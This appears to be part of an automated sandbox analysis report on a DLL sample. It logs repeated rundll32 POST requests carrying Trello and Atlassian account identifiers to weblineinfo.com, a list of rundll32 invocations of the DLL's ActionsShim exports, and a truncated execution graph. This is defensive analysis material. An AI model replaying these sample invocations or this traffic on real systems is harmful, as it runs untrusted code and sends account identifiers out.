    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:18:22 UTC335OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 34 39 32 34 32 36 62 61 32 35 32 32 33 39 38 30 35 33 61 38 37 35 61 66 36 31 31 62 35 39 66 35 32 65 32 34 32 33 38 37 30 35 37 39 35 36 33 38 31 36 33 65 36 39 33 64 35 64 37 64 37 39 39
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad7789492426ba2522398053a875af611b59f52e24238705795638163e693d5d7d799
    2024-08-09 14:18:22 UTC302INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:18:22 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:18:22 UTC41INData Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    8192.168.2.54972062.192.173.454433480C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:18:45 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:18:45 UTC335OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 33 39 32 34 32 37 37 61 36 32 36 33 35 39 61 37 35 33 63 65 32 32 66 66 31 31 62 61 32 38 34 33 31 65 34 33 66 33 63 37 30 32 36 39 37 31 65 66 34 30 37 65 37 65 30 64 62 64 35 63 31 39 33
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad77893924277a626359a753ce22ff11ba28431e43f3c7026971ef407e7e0dbd5c193
    2024-08-09 14:18:46 UTC302INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:18:46 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:18:46 UTC41INData Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    9192.168.2.54972162.192.173.454436112C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:18:47 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:18:47 UTC335OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 34 39 32 34 32 36 62 61 32 35 32 32 33 39 38 30 35 33 61 38 37 35 61 66 36 31 31 62 35 39 66 35 32 65 32 34 32 33 38 37 30 35 37 39 35 36 33 38 31 36 33 65 36 39 33 64 35 64 37 64 37 39 39
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad7789492426ba2522398053a875af611b59f52e24238705795638163e693d5d7d799
    2024-08-09 14:18:48 UTC302INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:18:47 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:18:48 UTC41INData Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    10192.168.2.54972262.192.173.454433480C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:19:07 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:19:07 UTC335OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 33 39 32 34 32 37 37 61 36 32 36 33 35 39 61 37 35 33 63 65 32 32 66 66 31 31 62 61 32 38 34 33 31 65 34 33 66 33 63 37 30 32 36 39 37 31 65 66 34 30 37 65 37 65 30 64 62 64 35 63 31 39 33
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad77893924277a626359a753ce22ff11ba28431e43f3c7026971ef407e7e0dbd5c193
    2024-08-09 14:19:07 UTC302INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:19:07 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:19:07 UTC41INData Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    11192.168.2.54972362.192.173.454436112C:\Windows\System32\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-08-09 14:19:09 UTC387OUTPOST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:19:09 UTC335OUTData Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 34 39 32 34 32 36 62 61 32 35 32 32 33 39 38 30 35 33 61 38 37 35 61 66 36 31 31 62 35 39 66 35 32 65 32 34 32 33 38 37 30 35 37 39 35 36 33 38 31 36 33 65 36 39 33 64 35 64 37 64 37 39 39
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad7789492426ba2522398053a875af611b59f52e24238705795638163e693d5d7d799
    2024-08-09 14:19:10 UTC302INHTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:19:09 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:19:10 UTC41INData Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:10:17:03
    Start date:09/08/2024
    Path:C:\Windows\System32\loaddll64.exe
    Wow64 process (32bit):false
    Commandline:loaddll64.exe "C:\Users\user\Desktop\10kmr9d7.dll"
    Imagebase:0x7ff7b1750000
    File size:165'888 bytes
    MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:1
    Start time:10:17:03
    Start date:09/08/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff6d64d0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:2
    Start time:10:17:03
    Start date:09/08/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1
    Imagebase:0x7ff71aa70000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:3
    Start time:10:17:03
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_CancelAllOperations
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:4
    Start time:10:17:03
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:6
    Start time:10:17:06
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Create
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:7
    Start time:10:17:09
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Destroy
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:8
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_CancelAllOperations
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:9
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Create
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:10
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Destroy
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:11
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetTxtReplaceData
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:12
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueReplaceData
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:13
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueDeleteData
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:14
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetBasicData
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:15
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_Delete
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:16
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ShutdownTargetDLL
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:17
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetMaxLogLevel
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:18
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetLogCallback
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:19
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActionsV2
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:20
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActions
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:21
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessPendingActionsAfterReboot
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:22
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_PrepareUpdate
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:23
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_IsDLLNewlyLoaded
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:24
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_InitTargetDLL
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:25
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMinorAPIVersion
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:26
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMajorAPIVersion
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:27
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreatsV2
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:28
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreats
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:29
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_FinishUpdate
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Reset < >

      Execution Graph

      Execution Coverage:1.6%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:6.2%
      Total number of Nodes:948
      Total number of Limit Nodes:17
      execution_graph 15617 1800013f0 15622 180005830 15617->15622 15619 18000140d 15620 180106ae4 57 API calls 15619->15620 15621 180106b29 15620->15621 15624 1800058f3 15622->15624 15623 1800059fb messages 15623->15619 15624->15623 15625 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 15624->15625 15626 180005a44 15625->15626 15635 180004e50 EnterCriticalSection 15626->15635 15628 180005a81 15629 180005c41 15628->15629 15630 180106664 std::_Facet_Register 5 API calls 15628->15630 15636 180004c60 LeaveCriticalSection 15629->15636 15631 180005a99 memcpy_s 15630->15631 15634 180005830 60 API calls 15631->15634 15633 180005c77 15633->15619 15634->15629 15635->15628 15636->15633 15652 180002bf0 15657 180022fa0 15652->15657 15655 180106ae4 57 API calls 15656 180106b29 15655->15656 15660 180022fc0 InitializeCriticalSectionAndSpinCount 15657->15660 15659 180002c00 15659->15655 15660->15659 15661 18000e7f5 15680 180105938 15661->15680 15663 18000e820 15664 180105938 std::_Lockit::_Lockit 6 API calls 15663->15664 15669 18000e86f Concurrency::cancel_current_task 15663->15669 15665 18000e845 15664->15665 15684 1801059b0 15665->15684 15666 1801059b0 std::_Lockit::~_Lockit LeaveCriticalSection 15668 18000e900 15666->15668 15670 180106610 Concurrency::cancel_current_task 8 API calls 15668->15670 15679 18000e8bc 15669->15679 15688 18000ec10 15669->15688 15671 18000e910 15670->15671 15674 18000e923 15733 180009930 15674->15733 15675 18000e8d4 15730 1801055e8 15675->15730 15679->15666 15681 180105947 15680->15681 15682 18010594c 15680->15682 15747 1801288bc 15681->15747 15682->15663 15685 1801059c4 15684->15685 15686 1801059bb LeaveCriticalSection 15684->15686 15685->15669 15689 18000ec4e 15688->15689 15729 18000ee8d 15688->15729 15691 180106664 std::_Facet_Register 5 API calls 15689->15691 15689->15729 15690 180106610 Concurrency::cancel_current_task 8 API calls 15692 18000e8ce 15690->15692 15693 18000ec60 15691->15693 15692->15674 15692->15675 15694 180105938 std::_Lockit::_Lockit 6 API calls 15693->15694 15696 18000eca0 15694->15696 15708 18000eebc 15696->15708 15780 18011d700 15696->15780 15702 180105ec0 55 API calls 15703 18000ed4e 15702->15703 15704 18000ed63 15703->15704 15705 18000eeb7 15703->15705 15794 18000f4c0 15704->15794 15707 180105240 Concurrency::cancel_current_task 2 API calls 15705->15707 15707->15708 15822 1801052c8 15708->15822 15709 18000ed7c 15710 18000f4c0 25 API calls 15709->15710 15711 18000ed92 15710->15711 15813 180105d24 15711->15813 15714 180105d24 13 API calls 15715 18000edf8 15714->15715 15716 18000ee1b 15715->15716 15717 18011bf80 ctype 13 API calls 15715->15717 15718 18000ee2e 15716->15718 15719 18011bf80 ctype 13 API calls 15716->15719 15717->15716 15720 18000ee42 15718->15720 15722 18011bf80 ctype 13 API calls 15718->15722 15719->15718 15721 18000ee56 15720->15721 15723 18011bf80 ctype 13 API calls 15720->15723 15724 18000ee6a 15721->15724 15725 18011bf80 ctype 13 API calls 15721->15725 15722->15720 15723->15721 15726 